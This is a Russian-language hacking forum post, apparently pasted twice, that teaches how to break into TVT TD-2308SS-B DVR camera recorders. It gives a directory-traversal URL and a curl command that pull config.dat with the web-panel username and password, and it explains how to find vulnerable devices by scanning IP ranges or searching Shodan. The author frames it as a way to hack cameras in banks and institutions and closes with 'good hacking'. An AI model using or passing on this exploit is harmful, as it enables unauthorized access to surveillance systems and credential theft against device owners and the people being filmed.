Intro
Всем братский приветос, хочу донести до Вас инфу, может и есть в паблике но она не расписана и не разжёванная. Сейчас очень много приходит информации о взломанных камерах наблюдениях, в банках, в учреждениях, даж на Украина на донбасе в последние время начали в мелькать
Инфа
Для начала, посмотрим на саму уязвимость, она была виставлена на Exploit-DB с тайтлом
"TVT TD-2308SS-B DVR directory traversal", - регистратор на 16 камер + 2 вихода на аудио, на котором стоит прошивка 3.2.0.P-3520A-00, и другие устройства с етой прошивкой. Атакующий может получить доступ до файлов конфигурации, таких как config.dat, где находится инфа для входа в веб интерфейс.
Адрес где лежит конфигурационный файл.
Парсинг
Именно для меня на данный момент такой способо парсинга самый актуальный.
Юзаю я Advanced IP Scanner - линк на офф линк на офф
Сам сканер. Выбран диапазон IP. Нас интересует шапка DVR Components Download
Вот такой вид имеет панель входа.
Вот код самого експлойта
Вот пример
Ну и все в итоге у нас юзер и пасс от панели
Maybe End
Все очень и очень просто.
Есть ище поисковик Шодан через который тоже можно искать камеры.
Кому интересно будет развивать данную уязвимось, я всегда открытий для обшения.
Вопросы, замечания в жаббер.
Удачного взлома Вам, маленькие хакеры/
Автор hack3core. Любите Дамагу :yahoo:
Всем братский приветос, хочу донести до Вас инфу, может и есть в паблике но она не расписана и не разжёванная. Сейчас очень много приходит информации о взломанных камерах наблюдениях, в банках, в учреждениях, даж на Украина на донбасе в последние время начали в мелькать
Инфа
Для начала, посмотрим на саму уязвимость, она была виставлена на Exploit-DB с тайтлом
"TVT TD-2308SS-B DVR directory traversal", - регистратор на 16 камер + 2 вихода на аудио, на котором стоит прошивка 3.2.0.P-3520A-00, и другие устройства с етой прошивкой. Атакующий может получить доступ до файлов конфигурации, таких как config.dat, где находится инфа для входа в веб интерфейс.
Адрес где лежит конфигурационный файл.
Код:
http://[IP ADDRESS]/../../../mnt/mtd/config/config.datПарсинг
Именно для меня на данный момент такой способо парсинга самый актуальный.
Юзаю я Advanced IP Scanner - линк на офф линк на офф
Сам сканер. Выбран диапазон IP. Нас интересует шапка DVR Components Download
Вот такой вид имеет панель входа.
Вот код самого експлойта
Код:
curl http://[IP Address]/../../../mnt/mtd/config/config.dat 2>/dev/null | stringsВот пример
Ну и все в итоге у нас юзер и пасс от панели
Maybe End
Все очень и очень просто.
Есть ище поисковик Шодан через который тоже можно искать камеры.
Кому интересно будет развивать данную уязвимось, я всегда открытий для обшения.
Вопросы, замечания в жаббер.
Удачного взлома Вам, маленькие хакеры/
Автор hack3core. Любите Дамагу :yahoo:
